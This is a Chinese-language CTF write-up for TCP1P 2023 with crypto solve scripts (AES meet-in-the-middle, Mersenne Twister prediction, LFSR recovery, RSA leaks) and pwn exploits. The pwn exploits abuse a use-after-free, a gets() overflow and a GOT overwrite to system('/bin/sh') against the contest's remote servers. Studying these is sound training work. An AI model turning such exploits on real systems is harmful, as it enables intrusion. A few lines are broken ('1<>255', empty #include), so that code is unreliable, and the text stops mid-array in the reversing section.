石氏是时试
石氏是时试

[TCP1P 2023] 部分crypto,pwn,reverse

Crypto

Final Consensus

这是个AES爆破密钥的题,加密方法是先后用两个密钥加密。远程先给出加密后的flag,然后允许输入值并进行加密。

from Crypto.Cipher import AES
import random
from Crypto.Util.Padding import pad

a = b""
b = b""
FLAG = b"TCP1P{REDACTED}"

def generateKey():
	global a, b
	a = (str(random.randint(0, 999999)).zfill(6)*4)[:16].encode()
	b = (str(random.randint(0, 999999)).zfill(6)*4)[:16].encode()

def encrypt(plaintext, a, b):
	cipher = AES.new(a, mode=AES.MODE_ECB)
	ct = cipher.encrypt(pad(plaintext, 16))
	cipher = AES.new(b, mode=AES.MODE_ECB)
	ct = cipher.encrypt(ct)
	return ct.hex()

def main():
	generateKey()
	print("Alice: My message", encrypt(FLAG, a, b))
	print("Alice: Now give me yours!")
	plain = input(">> ")
	print("Steve: ", encrypt(plain.encode(), a, b))
	print("Alice: Agree.")


if __name__ == '__main__':
	main()

漏洞在于两个密钥都很小。不过同时爆破两个也不可能。所以用到中间人攻击。先用爆破密钥a生成字典,再反向爆破b在a的字典里查询。

'''
┌──(kali㉿kali)-[~/ctf/lx/ezfmt]
└─$ nc ctf.tcp1p.com 35257
Alice: My message ad39b5f6d4071def39e5586024b4da6c82742ab83bcb772ddb39ffddaa5715e9d91982a06c343c9abb7350a30f54779e42e58d2d24de74e6c0e55329212c108427a1442d495a70647c92fed28c4f133c
Alice: Now give me yours!
>> 0000000000000000
Steve:  d170d66ff056f53944010a9b10e34b0585d521591b779f7cee054eae530682ff
Alice: Agree.
'''

from Crypto.Cipher import AES
import random
from Crypto.Util.Padding import pad

def encrypt(plaintext, a, b):
    cipher = AES.new(a, mode=AES.MODE_ECB)
    ct = cipher.encrypt(pad(plaintext, 16))
    cipher = AES.new(b, mode=AES.MODE_ECB)
    ct = cipher.encrypt(ct)
    return ct.hex()

c = 'd170d66ff056f53944010a9b10e34b0585d521591b779f7cee054eae530682ff'[:32]

cs = {}
for a in range(1000000):
    a = (str(a).zfill(6)*4)[:16].encode()
    c1 = AES.new(a, mode=AES.MODE_ECB)
    cs[c1.encrypt(b'0'*16)] = a 

print(len(cs))
for b in range(1000000):
    b = (str(b).zfill(6)*4)[:16].encode()
    c2 = AES.new(b, mode=AES.MODE_ECB)
    ct2 = c2.decrypt(bytes.fromhex(c))
    if ct2 in cs:
        print(cs[ct2],b)

a,b = b'7447427447427447', b'4402124402124402'

ct = bytes.fromhex('ad39b5f6d4071def39e5586024b4da6c82742ab83bcb772ddb39ffddaa5715e9d91982a06c343c9abb7350a30f54779e42e58d2d24de74e6c0e55329212c108427a1442d495a70647c92fed28c4f133c')
def decrypt(plaintext, a, b):
    cipher = AES.new(b, mode=AES.MODE_ECB)
    ct = cipher.decrypt(pad(plaintext, 16))
    cipher = AES.new(a, mode=AES.MODE_ECB)
    ct = cipher.decrypt(ct)
    print(ct)

decrypt(ct,a,b)
#TCP1P{nothing_ever_lasts_forever_everybody_wants_to_rule_the_world}

One Pad Time

 第2个AES题,用随机生成的key和iv加密flag,然后将ct与key异或。最后给出iv和异或后的ct

import os
from pwn import xor
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad

key = os.urandom(16)
iv = os.urandom(16)
cipher = AES.new(key, AES.MODE_CBC, iv)

pt = open("flag.txt", "rb").read()
ct = pad(cipher.encrypt(pt), 16)
ct = xor(ct, key)
print(f"{iv = }")
print(f"{ct = }")

 这个漏洞在于pad,这个pad不是在加密前而是在加密后,当flag的长度恰好是16的倍数里最后一块会是:chr(16)*16,可以利用这个块异或密文可以得到key,从而进行解密

iv = b'\xf5\x8e\x85ye\xc8j(%\xc4K\xc1g#\x86\x1a'
ct = b'h\x08\xafmDV\xaa\xcd\xea\xe9C\xdd7/\x1fF\xe2?\xcb\xb0\x1d F\xcc\xe5\xa6\x9dTJ\\\xd1\x90\xac\xe0\x1c\x891}\x83*\x86\xee\xc4~\xa0\x18\xa8\x06\xea"{|\x0b\x92[\x9a[\x91\xc8\x19\xb7FK\x01\xb5\xf98\x80\x9bR)2\x84`\xb3E\t\xd5\xe5\xf0[\x83\xc6\x19\x82\r\x7f\xfaGF\xdb\xcb\xab\xd5~\x95\t\xdd\xb5E>F\xdd\xa9\xa6\x82\x86\xee"\x99\xd9\xcc\xaf\xce\xf0\'\xb3\xf4~\xcf\xdb\xc8\xbd3\x01\xd0,}]\xd5V\xd3?\xb0\xe7\xb4[4\x8a\xa2[\xa1TV\xd16\x1f\xbd"\xc8\xa2\\K\x16I%\xdaL\xc6\xfb\xb7f.\x98\xc3\xf4J\x1b\xe9TT\x83-\x98BO\xb4\x00~\xb5w\xcf7m\xa1\xea\xa9\xf6\xa6\xee\x00Y\xdfE\x9c7\xe3\xa3\xa2\x1f=.\x85\x08l\xacN\xfb2\x89\x8bB\x7f\x94\x91p\x10ep\x9b\x06oz\x87&U]J\x019\x12W\xce<\xc8\xa8\xb4v\xaf,\xb1n\x8b\xf5\xfe\xf8\r\xa7:r\xe8\xe0fvKN\\\xea\xe0\xa1\xe3\x99\xcc\xfd\x1a\x99Q\x90\xdf}\xae\xad'

#ct为16的整数倍,pad(16) 尾部为\x10*16
tail = ct[-16:]
key = xor(tail, b'\x10')

cipher = AES.new(key, AES.MODE_CBC, iv)
flag = cipher.decrypt(xor(ct,key))
#TCP1P{why_did_the_chicken_cross_the_road?To_ponder_the_meaning_of_life_on_the_other_side_only_to_realize_that_the_road_itself_was_an_arbitrary_construct_with_no_inherent_purpose_and_that_true_enlightenment_could_only_be_found_within_its_own_existence_1234}

Spider Shambles

这是个有python随机数预测题。远端有两个route,一个是把上传的文件与随机数异或,另一个是把flag图片与随机数异或。

import os
from flask import Flask, flash, request, redirect, render_template, send_file
import io
import random
from Crypto.Util.number import long_to_bytes as l2b

app=Flask(__name__, template_folder='./template')

app.secret_key = "OFCOURSETHISISNOTHEREALSECRETKEYBOI"
app.config['MAX_CONTENT_LENGTH'] = 16 * 1024 * 1024


ALLOWED_EXTENSIONS = set(['txt', 'pdf', 'png', 'jpg', 'jpeg', 'gif'])


def allowed_file(filename):
    return '.' in filename and filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS


def xor(a, b):
    return b''.join([bytes([_a ^ _b]) for _a, _b in zip(a, b)])

def encropt(buff):
    rand = random.getrandbits(len(buff)*8)
    return xor(buff, l2b(rand))


@app.route('/', methods=['GET'])
def upload_form():
    return render_template('./upload.html')


@app.route('/', methods=['POST'])
def upload_file():
    if request.method == 'POST':
        if 'file' not in request.files:
            flash('No file part')
            return redirect(request.url)
        file = request.files['file']
        if file.filename == '':
            flash('No file selected for uploading')
            return redirect(request.url)
        if file and allowed_file(file.filename):
            buff = io.BytesIO()
            buff.write(encropt(file.read()))
            buff.seek(0)
            return send_file(
                buff,
                mimetype="text/plain",
                as_attachment=True,
                download_name='lalalalululu')
        else:
            flash('Allowed file types are txt, pdf, png, jpg, jpeg, gif')
            return redirect(request.url)

@app.route('/flago', methods=['GET'])
def send_flago():
    flago = open('./flago/flago.jpg', 'rb')
    buff = io.BytesIO()
    buff.write(encropt(flago.read()))
    buff.seek(0)
    return send_file(
        buff,
        mimetype="text/plain",
        as_attachment=True,
        download_name='babababububu')

if __name__ == "__main__":
    app.run(host = '0.0.0.0',port = 5000, debug = False)

两次只要相邻就可以,先生成个足够长的文件。624*32位,然后下载文件,用第1个文件生成取出随机数完成对第2个flag文件的恢复

#open('a.txt','wb').write(b'\x00'*624*4)

from pwn import xor 
from Crypto.Util.number import long_to_bytes as l2b, bytes_to_long as b2l
from extend_mt19937_predictor import ExtendMT19937Predictor

a = open('lalalalululu','rb').read()
c = open('babababububu','rb').read()
predictor = ExtendMT19937Predictor()
#导入已知的624个数据,导入后指向尾部
predictor.setrandbits(b2l(a), 624*32)

def encropt(buff):
    rand = predictor.predict_getrandbits(len(buff)*8)
    return xor(buff, l2b(rand))

m = encropt(c)
open('flago.jpg', 'wb').write(m)


#TCP1P{life's_twisted_like_a_back_road_in_the_country}

shiftgner

一个LFSR的题,有点变化。

有生成签名,验证签名和得到加密后的flag

import os

flag = open('flag.txt','r').read()
assert flag.startswith('TCP1P{') and flag.endswith('}')
flag = flag[6:-1]
assert len(flag) == 32

class Shiftgner:
    def __init__(self, mask):
        self.mask = int.from_bytes(mask, byteorder='big')
    
    def next(self):
        c = self.state & self.mask
        x = 0
        while c:
            x ^= c & 1
            c >>= 1
        self.state = ((self.state << 1) ^ x) & 2**256-1
        return x
    
    def sign(self, msg):
        self.state = msg
        op  = self.next()
        for i in range(255):
            op <<= 1
            op ^= self.next()
        op ^= msg
        return hex(op)
    
    def verify(self, msg, sig):
        return self.sign(msg) == sig

mask = os.urandom(32)
signer = Shiftgner(mask)

while True:
    print('1. Sign')
    print('2. Verify')
    print('3. Get Flag')
    print('4. Exit')
    op = int(input('> '))
    if op == 1:
        msg = int(input('Message (hex): '), 16)
        print('Signature:', signer.sign(msg))
    elif op == 2:
        msg = int(input('Message (hex): '), 16)
        sig = input('Signature: ')
        if signer.verify(msg, sig):
            print('OK')
        else:
            print('Invalid')
    elif op == 3:
        print(signer.sign(int.from_bytes(flag.encode(), byteorder='big')))
    elif op == 4:
        exit()
    else:
        print('Invalid')

由于lfsr没有给mask所以要先爆破mask

当输入一个只有第n的值时与mask异或,如果mask第n位为0则第1次next后结果为1,经过256次next后他移到第0位,所以通过判断第0位可以得到1位的mask

class Shiftgner:
    def __init__(self, mask):
        self.mask = int.from_bytes(mask, byteorder='big')
    
    def next(self):
        c = self.state & self.mask
        x = 0
        while c:
            x ^= c & 1
            c >>= 1
        self.state = ((self.state << 1) ^ x) & 2**256-1
        return x
    
    def sign(self, msg):
        self.state = msg
        op  = self.next()
        for i in range(255):
            op <<= 1
            op ^= self.next()
        op ^= msg
        return hex(op)
    
    def verify(self, msg, sig):
        return self.sign(msg) == sig


def get_mask(idx):
    p.sendlineafter(b'> ', b'1')
    p.sendlineafter(b'Message (hex): ', hex(1<>255)&1 
    return bit 

def check_mask(msg,sig):
    p.sendlineafter(b'> ', b'2')
    p.sendlineafter(b'Message (hex): ', hex(msg)[2:].encode())
    p.sendlineafter(b'Signature: ', sig.encode())
    if b'OK' in p.recvline():
        return True 
    else:
        return False

#爆破mask
from pwn import *
from Crypto.Util.number import long_to_bytes,bytes_to_long 

p = remote('ctf.tcp1p.com', 13342)

tmp_msg = 0x309c0b52a8b9120c17caea49009ade08bb656dcc1f7fc8ef0f8360e85b573fa6

p.sendlineafter(b'> ', b'3')
print(p.recvline())

smask = ''
for i in range(256):
    if get_mask(i):
        smask += '1'
    else:
        smask += '0'
    
    if i>253:
        context.log_level = 'debug'
        mask = long_to_bytes(int(smask[::-1],2))
        signer = Shiftgner(mask)
        tmp_enc = signer.sign(tmp_msg)
        if check_mask(tmp_msg, tmp_enc):
            break 

print(mask)

p.interactive()

然后得到密文进行处理。根据LFRS构造简单的矩阵M,乘256次幂

问题来了,他给的不是直接得到的密文,是密文与明文异或的结果

state * M^256 = enc^^state

由于按位的异或在GF(2)上等同于加所以这里可以推一下,然后就可以用矩阵求左了。

state*M^256 = enc + state => sate*M^256 + state = enc => state *(M^256+I) = enc 

from Crypto.Util.number import bytes_to_long, long_to_bytes
mask = b'\x02,#Vl\xad\xc6\xa0\xe1r\xb6\xf5\xe1\xc0<\x11\x86]\xb4N\xcd\xf4\xb9\xcf\xddW{,i\xa1-2'
enc  = 0xa5c0ce349da06456bea1d6cd58ae29fe497898dcc4c18a0960a4e0c2597abcf3

#state * M^256 = c ; c = enc ^^ state
#state * M^256 = enc + state => state*(M^256+I) = enc 
maskb = [int(i) for i in bin(bytes_to_long(mask))[2:].rjust(256, '0')] 
encb = [int(i) for i in bin(enc)[2:].rjust(256, '0')] 

encv = vector(GF(2), encb)
M = matrix(GF(2), 256,256)
for i in range(255):
    M[i+1,i] = 1 
for i in range(256):
    M[i,-1] = maskb[i]

M256 = M^256 
for i in range(256):
    M256[i,i] += 1

state = M256.solve_left(encb)
ss = ''.join([str(i) for i in state])
long_to_bytes(int(ss,2))
#b'well_not_safe_enough_apparently!'

Eclairs

 这是个小指数攻击题

route1给出pow(a,e,n),pow(b,e,n)并可以输入x得到椭圆曲线上的点P

route2给出随机数k和随机点P,需要输入k*P然后可以得到RSA加密后的flag

from Crypto.Util.number import getPrime, bytes_to_long
from sympy.ntheory.modular import crt
from libnum.ecc import *
import random
import time

while (p:=getPrime(256)) % 4 != 3: pass
while (q:=getPrime(256)) % 4 != 3: pass
e = 3
n = p*q
a = getPrime(256)
b = getPrime(256)
E = Curve(a, b, n)
flag = bytes_to_long(open("flag.txt", "rb").read())

def sqrt_mod(a):
    assert p % 4 == 3
    assert q % 4 == 3
    r = int(crt([p,q],[pow(a,(p+1)//4,p), pow(a,(q+1)//4,q)])[0])
    n = p*q
    if pow(r,2,n) == a % n:
        return r
    return False

def lift_x(x):
    y = sqrt_mod(x**3 + a*x + b)
    if y:
        return (x, y)
    return False


def find_coordinates(x):
    P = lift_x(x)
    if P:
        x,y = P
        return (pow(x,e,n), pow(y,e,n))
    return False

def captcha():
    while True:
        x = random.randint(1, n)
        P = lift_x(x)
        if P : break
    k = random.randint(1,n)
    print("HOLD UP!!!!")
    print("YOU ARE ABOUT TO DO SOMETHING VERY CONFIDENTIAL")
    print("WE NEED TO MAKE SURE THAT YOU ARE NOT A ROBOT")
    print(f"Calculate {k} X {P}")
    ans = input("Answer: ")
    return ans == str(E.power(P,k))
    

while True:
    print("1. Check out my cool curve")
    print("2. Get flag")
    print("3. Exit")
    choice = input(">> ")

    if choice == "1":
        print("This point is generated using the following parameter:")
        # encrypted because I don't want anyone to steal my cool curve >:(
        print(pow(a,e,n))
        print(pow(b,e,n))
        x = int(input("x: "))
        P = find_coordinates(x)
        if P:
            print(P)
        else:
            print("Not found :(")

    elif choice == "2":
        if captcha():
            print(pow(flag, e, n))
        else:
            print("GO AWAY!!!")
            exit()
    elif choice == "3":
        exit()
    else:
        print("??")
        exit()

 第1步是得到几个点,通过多点通过groebner基求参,然后得到kP拿到pow(flag,e,n)

from pwn import *
#from sage.all import *
from Crypto.Util.number import getPrime

io = remote('ctf.tcp1p.com', 13341)
context.log_level = 'debug'

while True:
  io.sendlineafter(b">> ", b'1')
  io.recvline()
  
  a3 = int(io.recvline())
  b3 = int(io.recvline())
  x = getPrime(172)
  io.sendlineafter(b"x: ", str(x).encode())
  p1 = io.recvline()
  if b'Not found' not in p1:
    break

x3,y3 = eval(p1)

io.sendlineafter(b">> ", b'2')
io.recvuntil(b"Calculate ")
ks,ps = io.recvline().decode().split(' X ')
k,ps = int(ks), eval(ps)

print('a3 = ', a3)
print('b3 = ', b3)
print('x  = ', x)
print('x3 = ', x3)
print('y3 = ', y3)
print('k = ', ks)
print('ps = ', ps)
print('''

P. = PolynomialRing(Zmod(x^3 - x3))
f1 = y3**2 - (x**3 + a*x + b)**3
f2 = a**3 - a3 
f3 = b**3 - b3 
F = [f1,f2,f3]

ideal = Ideal(F)
I = ideal.groebner_basis()
print(I)
# 求解参数a b n
res=[x.constant_coefficient() for x in I]
n = res[2]
a = -res[0]%n
b = -res[1]%n

E=EllipticCurve(Zmod(n),[a,b])
P = E(ps)
vv = str((k*P).xy())
print(vv)
''')



vv = input('>> ')
io.sendlineafter(b"Answer: ", vv.encode())
print(io.recvline())

io.interactive()

但是由于这里的n不能分解而且每个因子都是e的倍数,所以不能直接求d求解。

所以这里需要运行3次得到3组c,n然后通过crt再求解

f3 = [10214848419600246831204411547539742193707813055567247375021038647290724315016659616660536702996500513761107565676235103712959560533312159280239704791794925,3396605071922311846139395452288997433024781942346189910790944052301893968430215014289904153958067122829261905886478214418519271429601284233135621257964618,761237673974641516291589885468522351425564157626437289615389611558679935803922321917991872667343987358442284415608440848211692141410743644819475163258241]
n = [10827306454907668600102942320713698127633782031630218229451809487758431009675084908799293132704868105802645330911405420947841753386681060626958945819983153,5640375403375610044579756340430504833924414898126539274638537893039893254750588837263470550538549615353665314709455243822275945022123811639017611583317777,9581444265394380026197526005575551873068579451790843486976927778420460013670858606351862661812095383739259531098874637083082471478987773885695409384957361]
from gmpy2 import iroot
from Crypto.Util.number import long_to_bytes
long_to_bytes(iroot(crt(f3,n),3)[0])
#b'TCP1P{yet_another_ecrsa_challenge_smh_my_head}'

CherryLeak

 一共3个菜单,

1是更换因子可以选择更换p或q,

2是pow(p+q,e,n)或p-q或pow(p//q,e,n)或p%q

3得到pow(flag,e,n)

from Crypto.Util.number import getPrime, bytes_to_long

p = getPrime(1024)
q = getPrime(512)
n = p * q
e = 65537

FLAG = b"TCP1P{???????????????????????????????????????}"

lock = False
while True:
    print("1. Get new prime")
    print("2. Get leak")
    print("3. Get flag")
    print("4. Exit")
    print("> ", end="")
    try:
        choice = int(input())
    except:
        break
    if choice == 1:
        if lock:
            print("You can't do that anymore!")
            continue
        print("which prime? (p/q)")
        print("> ", end="")
        prime = input()
        if prime == "p":
            p = getPrime(1024)
        elif prime == "q":
            q = getPrime(512)
        else:
            print("What?")
            continue
        n = p * q
        lock = True
    elif choice == 2:
        print("choose leak p ? q (+-*/%)")
        print("> ", end="")
        leak = input()
        if leak == "+":
            print(f"p + q = {pow(p + q, e, n)}") # nuh uh
        elif leak == "-":
            print(f"{p - q = }")
        elif leak == "*":
            print(f"p * q = {pow(p * q, e, n)}") # nuh uh
        elif leak == "/":
            print(f"p // q = {pow(p // q, e, n)}") # nuh uh
        elif leak == "%":
            print(f"{p % q = }")
        else:
            print("What?")
    elif choice == 3:
        print(f"c = {pow(bytes_to_long(FLAG), e, n)}")
        lock = True
    elif choice == 4:
        break
    else:
        print("What?")

这里没有给n所以pow的项基本都没用只有p-q和p%q有用。通过两次更换p得到两组p-q,p%q

p1-q = a1;p2-q=a2; p1%q = b1; p2%q = b2 
p1%q = b1 => (a1+q)%q = b1 => a1 - b1 = k1*q 
同理 a2-b2 = k2*q

所以有 gcd(a1-b1,a2-b2) == q 

然后猜flag很小不够512位,直接用q求解。当然这时候如果大的话就用p-q得到p再用n求解

a1 = 118706088974227518157101680027186674666863052281725325927297274164964302139731337841107407768851841545449624689187205116287815171368370612682872627416560148527259214298108640666822887975035465398738029963994364413364943599455933922801313625121544409844530893995801596056172346904433206927995247016759064476398
a2 = 100351615317445702152777964069743649398316212344162267495671594615569055290986135868626263523806430759891170534637574207955408234730596945183415870186173043369109401951133898271038937899799483714916470998534146162842383074553370989509167955524749120524690247454745041141487860434030140627355547358367468053348
b1 = 4314795467650780507560916399060478760618314523719619015061803791641365559151910235009915855099750842779686623768320324592460652847539030204752241436322958
b2 = 4791644667072068328755322354434990455138080676548441050438770559180497990442392529487882111217227208028008732173855940070706695343457703400581487284992319
'''
p1-q = a1;p2-q=a2; p1%q = b1; p2%q = b2 
p1%q = b1 => (a1+q)%q = b1 => a1 - b1 = k1*q 
同理 a2-b2 = k2*q
'''
q = gcd(a1-b1, a2-b2)

c = 169440822506346087750225114526740311477268001776493344763509930657373781878796338949268854077207461627691471962438795049472698199268203515665176148463051816183812000048162656457151448248775507398267111109027802942220858089591755527835080399986885463364652988782541810022030642988075275702530345128326508123508315731510268333168893081158203576004922211336014214517310663167783741576232446051470012829653525376038196226299471633664465371322016508015683415653380689
e = 65537
m = pow(c, invert(e, q-1),q)
long_to_bytes(m)
#b"TCP1P{in_life's_abundance_a_fragment_suffices}"

 PWN

babyheap

在free的时候没有清指针,有UAF,当get_flag时会重用这些堆块,然后通过show得到flag

int __cdecl main(int argc, const char **argv, const char **envp)
{
  setup(argc, argv, envp);
  while ( 1 )
  {
    switch ( (unsigned int)menu() )
    {
      case 1u:
        create();
        break;
      case 2u:
        delete();                               // UAF
        break;
      case 3u:
        view();
        break;
      case 4u:
        read_flag();
        break;
      case 5u:
        puts("[*] exiting...");
        exit(0);
      default:
        puts("[!] unknown choice");
        break;
    }
  }
}
add 1-5 112
free 1-5 
read_flag
show 1
TCP1P{k4mu_m4kan_ap4_1ni_k0q_un1qu3_s3k4li_yh_k4kung_chef_0ma1good_r3cyle???}

BlufferOverflow

这题给了原码

#include 
#include 

char buff[20];
int buff2;

void setup(){
	setvbuf(stdin, buff, _IONBF, 0);
	setvbuf(stdout, buff, _IONBF, 0);
	setvbuf(stderr, buff, _IONBF, 0);
}

void flag_handler(){
	FILE *f = fopen("flag.txt","r");
  	if (f == NULL) {
    	printf("Cannot find flag.txt!");
    	exit(0);
  }
}

void buffer(){
	buff2 = 0;
	printf("Can you get the exact value to print the flag?\n");
	printf("Input: ");
	fflush(stdout);
	gets(buff); 
	if (buff2 > 5134160) {
		printf("Too high!\n\n");
	} else if (buff2 == 5134160){
		printf("Congrats, You got the right value!\n");
	 	system("cat flag.txt");
	} else {
		printf("Sad, too low! :(, maybe you can add *more* value 0_0\n\n");
	}
	printf("\nOutput : %s, Value : %d \n", buff, buff2);
}

int main(){
	flag_handler();
	setup();
	buffer();
}

输入buff时覆盖到buff2得到flag

from pwn import *

#p = process('./pwn1')
p = remote('ctf.tcp1p.com', 17027)
context(arch='amd64', log_level='debug')

p.sendlineafter(b"Input: ", b'A'*20 + p32(5134160))

p.interactive()
#TCP1P{ez_buff3r_0verflow_l0c4l_v4r1abl3_38763f0c86da16fe14e062cd054d71ca}

unsafe safe

允许在输入一个地址然后给这个地址加一个值

#include 
#include 
#include 
#include 

unsigned long safes[100] = {7955998170729676800};
char *exit_message = "Have a nice day!";

void init() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    setvbuf(stderr, NULL, _IONBF, 0);
}

void deposit() {
    int index = 0;
    int amount = 0;
    puts("Enter the safe number you want to deposit in (0-100): ");
    scanf("%d", &index);
    puts("Enter the amount you want to deposit: ");
    scanf("%d", &amount);
    safes[index] += amount;
}

void login() {
    unsigned long age, input, password;
    char pet_name[5] = "\0\0\0\0\0";
    puts("Input your age: ");
    scanf("%lu", &age);
    if (age < 17) {
        puts("Sorry, this is not a place for kids");
        exit(0);
    }
    puts("Input your pet name: ");
    scanf("%5c", pet_name);
    srand(time(NULL) * (*(short *)pet_name * *(short *)(pet_name + 2) + age));
    password = rand();
    puts("Input your password: ");
    scanf("%lu", &input);
    if (input != password) {
        puts("Password Wrong!");
        exit(0);
    }
}

int main() {
    init();
    login();
    deposit();
    deposit();
    deposit();
    puts(exit_message);
}

由于种子是0可以得到password然后将got[exit]改为system把msg改为/bin/sh

from pwn import *

#p = process('./unsafe')
p = remote('ctf.tcp1p.com', 1477)
context(arch='amd64', log_level='debug')

#gdb.attach(p, "b*0x00005555555552bc\nc")
# -17*1 + 17
p.sendlineafter(b"Input your age: ", b'246')
p.sendafter(b"Input your pet name: ", p64(0x1ff)[:4])
p.sendlineafter(b"Input your password: ", str(0x6b8b4567).encode())

#2 safe+8 /sh  
#100 exit_message: 2008->4064
#-24 got.puts 6b00->d920
p.sendlineafter(b"Enter the safe number you want to deposit in (0-100): ", b'1')
p.sendlineafter(b"Enter the amount you want to deposit: \n", str(u32(b'/sh\x00')).encode())

p.sendlineafter(b"Enter the safe number you want to deposit in (0-100): ", b'100')
p.sendlineafter(b"Enter the amount you want to deposit: \n", str(0x205c).encode())

p.sendlineafter(b"Enter the safe number you want to deposit in (0-100): ", b'-12')
p.sendlineafter(b"Enter the amount you want to deposit: \n", str(-168416).encode())

p.sendline(b'cat flag*')
p.interactive()

REV

lock the lock

是一个可以正常反编译的python pyc文件,反过来就是个xor加密

a = '1101111100001010100101011100011010111000101110011010110011100111001101000000000000000000010000000011101100011110110101000110100001100011111110010010000000001111010001101010111011000011010001110110101101001011011011011101100111001111101001010010011001001101010111011100011110001100010100000100010110000110011100011001101000100101111000111000001101001011011110001111100110001101101111100100110011011001011111000001111100011100100110111000101000001110100000111010011110111101011011101100001011110111000011111111101001110110100100011111110011010110110110101010000001000011111010101111111111011001110110100110001011100100100000110010100000000111111111100010111101000011010010111100011100001010100101010010001100011111010110111111110101001010101011000110011010010110000001001110111100000110001010000010101001110000010000011101101111111000010011111000100001010010010111101010011100000100011101111010100010000010001011100010000000001110100111001101011001110100010000111010011000011010001001010000101100000100000101100110010100111001011111101110001110011010000011001100001110001100111010001001111110000111100011010001100100110111101111111000000111111111001010011010110000111001011010101101001101100110000101000111111011001110100110000011110101101001000001000110100000111001000111110010111110101000011110011000010011011111110101110101111000110110001011111111110101000110101000001110001111111100001000101000100100011110010101011010011110000011101010110011010011010000001111101100100100101001101110111100110111101010111010010100001011101101011111110001001010011001110000100011100100111000110011010110010010011010110010101000110101001110101010100101110111001101110110000000001101101000111000011000010000110100001001101111100111001001010100001011100101001100101110000111001010010100000110001110000011011100101001100101010011111110100010111100000101000110110010101010100000100110010111011101011011011001110111010001001100110110000011010010010000111110000110110010101100100010100110001010010000100001011001011001101010100100001001111110001101000010111101000010110000001010001101011111101100100111001000101110101100100001010101110100000110011110010011011000011001100111110011010100110100010001110101111000110101000111100100111100001000100001110001001000111000111001000111100010011101001010010101110100101111001100110000110100101100010000000101000101000111010111000101011001101010001101111010011111011110000111110001110011010010010111100010000110100100011010111000001011000111111111010010110111011000100110100110011111111000111000110011000101000110110001100000000001110000000110111101000011010010011001111010101001110110011100110111010110011101011101000011000000101000010011011111101001000011110110100000100111111000000010010110011011101110110101011100001010100011101101001101101100001000011110001010110001010001101100110101001001101011000000100011010100101110110111111110000000101101001010100001011001011010010000110010110111011000100011110010101000011110001111000101101010001101110101101011011111110100000001010000111100001111101111000111100011101010101010100101011100101001110010111000011010001010010101000110011000100111001001000000111110110111111101000000100111111101001110100110001110001011111011001101001011000111101000000000000101010110100000111100010111110011110011011000001011110010010000001001101101001111010000001010111111110101001000111000010111111001100110000000110111101000011001101111011110011110000001101001101000011100111001000101000110011101011000010110110110001101011000010011100001000111111110011000001000010111101000100010011001011110111011101100101000011101100011011010101000010110001001000100001110100110011101011011011011011101010010110110000011111001111100101100001110100000111011010111000110110011011110101110111011100110011001000111111111010001111100100101011111011010001101111110100110011000100110001001011111000111000011000000000111101011001010000110011101011100101101110110010001010001111100110100000111111111110111010100100000000101100011101111100001001010111000001001011011010001101010100100110100111011100101010010101001000100111001110110110101011000011011011110001111111000101010010111101101100010100110110111010010110000110100011000001100001000100011100110010100101101101000010001100101101100000001011011011101110110011000100001110010011000001101100001001010101101100000111101110000101101110110100010111101010111001001001010100100011101000010111111100101011111100101110111100001000001110101001101000000111101111100110011010100011100111111111000001110100111000001101001111111100001100000011111100110000110011011011111010111101010110111001100010010111010110010001010100001100010000000111101010100111111100100101000000110100100110001100101111001011001011111101011011100011111011000001001100110000111010110000100000000011001001000110010010110101111100001100011101101111110001010001010010100010100100110100000101111101010100101101101111011111111010000010101111011001100100110101100001101101110001001001010001010001000011110110101101111001000011110111101111100011001010010111100001111000100001101010000010001100000110000000001001001110011110111010001101000011011100101101000011001111001100100100110000011110100001111001011100111110000000110000000101110101011101010010111011000011011111000110000011010110111000001100001001011011011010100111101110101000001100000101111010001111100010000011100100100011101111110000000000010011101000000011010001100001100011011101100011001011110001111101000000100100100110001010001110001110011101000011010000000101000110110010011101001001010110111001110001101000011110100110101111001010001111011101111011111101011100001101100110111101110001001100000101111001010001100100100000100001100110010001111101011000010101001110001100011010101001000010010110001111001011101101011000010001111101001001101100110010101101100101001011100000000110000111001100100111110000010101011001101010101010100011110100111110101000110100110000110111010010111001001100010011001010010000011000010010011000101000010100000110011010010101000110011010001010101101110001010010101100001010101111001101111101110001101100101001011000000111011000000010001110100111110111101110111100101110110100110000011100100100011011001000110010010000010010111001010111000001010001011000111001100010101101000100000101000110111001000100110100101100011101010000010011101101001101010100010011011010000111100101010101001101010111010000101011001010100010110011111100101000000000001001111011101100111001001100001111001000000111001011000110001000111001010110101100000111000001100101010001100001010000011110011011001100010010110011011000011011101001101110110010111001010011011001000110011100010100111011001101010100111101111111001010010010100100000110001101011110011011101001001111100011111001100111101101100001000101100100101110010101101101001001000011001100011101110000110010101001111110011010010111010001110100101001110011110100011010111001111010010110100001011110110001100001100100010000111101000001101101000100110110110001001110011010100110110111001111101101111100110000011111110010000101001110111101011000001110100101101001011111100111110001110111110001000110100101000001110000001101100000100001000101010010000010100010100000110011100000111101111101100111100011110100111101011001011101110111111111011110000100000110001110011000010001001010011111010001000111111100101101001111100011011000010001101001010000111111000011101110000001000011110010000010110101001000001001111111011010110101100001100110010100000001010111100100001110100110110101111011000111011101000000110110110100100000110000101101111000101110101110100010001001100110010000011000100001111000111100000011110110001000111011110001100110000110111101011111101110110000111101110010000100011101010011101111001000011101101011110100000011001111000011010001111110100100110011111111111011000110101100111101101111000011001110100000111111000011101100111110001111010101001000111101100000101011000110111100100110000011100011111010100110101110001110100011101111011000000110101111000111000001110100100000001110000001010010101110111111010011110000100001010000000111111001111000000001111110000110011101000101110101101000111100110001010000101100011010100101100110101010001100111001011000100101101110010100011111110100100111100011100110000101100011111110100101110101100101100101000010001100010'

FLAG = [90, 19, 95, 37, 58, 144, 131, 222, 253, 162, 107, 96, 98, 128, 30, 
     113, 192, 236, 135, 239, 80, 106, 215, 100, 110, 197, 64, 
     210, 9, 74, 180, 240, 70, 87, 127, 17, 53, 115, 106, 178, 
     9, 250, 235, 99, 89, 195, 146, 89, 217, 74, 10, 133, 14, 
     82, 27, 70, 77, 111, 232, 144, 201, 98, 178, 88, 201, 190, 
     34, 135, 62, 24, 236, 102, 197, 158, 19, 0, 228, 252, 32, 
     128, 109, 157, 209, 104, 65, 104, 70, 49, 255, 14, 79, 133, 
     95, 195, 233, 45, 122, 200, 56, 207, 207, 225, 98, 23, 130, 
     91, 77, 37, 31, 242, 114, 187, 142, 40, 217, 238, 94, 83, 
     44, 191, 121, 249, 30, 241, 94, 121, 55, 243, 197, 136, 254, 
